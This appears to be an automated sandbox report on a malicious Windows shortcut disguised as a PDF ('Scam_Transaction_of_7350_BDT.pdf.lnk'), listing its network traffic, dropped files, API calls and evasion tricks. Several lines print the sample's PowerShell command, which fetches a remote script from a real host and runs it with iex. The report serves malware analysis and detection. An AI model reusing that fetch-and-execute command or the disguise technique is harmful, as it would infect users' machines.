Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:50014 version: TLS 1.2

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Onedrive.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\sppc.dllJump to dropped file
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkLNK file: /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD20020 NtAllocateVirtualMemory,NtProtectVirtualMemory,4_3_000001729DD20020
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,4_2_00007FFDF3AD1010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD1960 NtAccessCheck,4_2_00007FFDF3AD1960
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD358AF4_3_000001729DD358AF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD20BDF4_3_000001729DD20BDF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD2876F4_3_000001729DD2876F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD2A71A4_3_000001729DD2A71A
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD3764F4_3_000001729DD3764F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD2C13F4_3_000001729DD2C13F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA113844_2_00007FF63EA11384
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA157D04_2_00007FF63EA157D0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA170104_2_00007FF63EA17010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1A33C4_2_00007FF63EA1A33C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA18CE04_2_00007FF63EA18CE0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1892C4_2_00007FF63EA1892C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1E0484_2_00007FF63EA1E048
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA164544_2_00007FF63EA16454
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1ACA44_2_00007FF63EA1ACA4
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1C2144_2_00007FF63EA1C214
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1D98C4_2_00007FF63EA1D98C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA17B1C4_2_00007FF63EA17B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA15E744_2_00007FF63EA15E74
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA18E4C4_2_00007FF63EA18E4C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEB5A04_2_00007FFDF3AEB5A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD10104_2_00007FFDF3AD1010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3B023A04_2_00007FFDF3B023A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEA3104_2_00007FFDF3AEA310
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEC6DE4_2_00007FFDF3AEC6DE
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD2B004_2_00007FFDF3AD2B00
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEC9804_2_00007FFDF3AEC980
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD19604_2_00007FFDF3AD1960
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEA8F04_2_00007FFDF3AEA8F0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEAD914_2_00007FFDF3AEAD91
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AEBDC04_2_00007FFDF3AEBDC0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FFDF3AEDDC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FFDF3AEEFC0 appears 198 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FFDF3AEDE30 appears 85 times
Source: classification engineClassification label: mal92.evad.winLNK@7/9@1/2
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA17B1C CoCreateInstance,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,4_2_00007FF63EA17B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FF63EA1BF50 FindResourceExW,LoadResource,LockResource,GetLastError,GetLastError,GetLastError,4_2_00007FF63EA1BF50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vemtfwyl.t02.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkVirustotal: Detection: 14%
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppcext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dui70.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winscard.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dpapi.dllJump to behavior
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkLNK file: ..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp, sppc.dll.2.dr
Source: Binary string: phoneactivate.pdbGCTLG source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: phoneactivate.pdb source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Binary string: phoneactivate.pdbGCTL source: Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Onedrive.exe.2.drStatic PE information: 0xBBFECFD3 [Thu Dec 12 01:52:19 2069 UTC]
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,4_2_00007FFDF3AD1010
Source: Onedrive.exe.2.drStatic PE information: section name: .imrsiv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A4A28 push E95D50BCh; ret 2_2_00007FFD9B8A4AA9
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD32D0B push ds; ret 4_3_000001729DD32D0E
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD38A53 push 2F672291h; retf 4_3_000001729DD38A92
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_3_000001729DD251C3 push FF00009Eh; ret 4_3_000001729DD251C8

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Onedrive.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\sppc.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.lnkStatic PE information: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
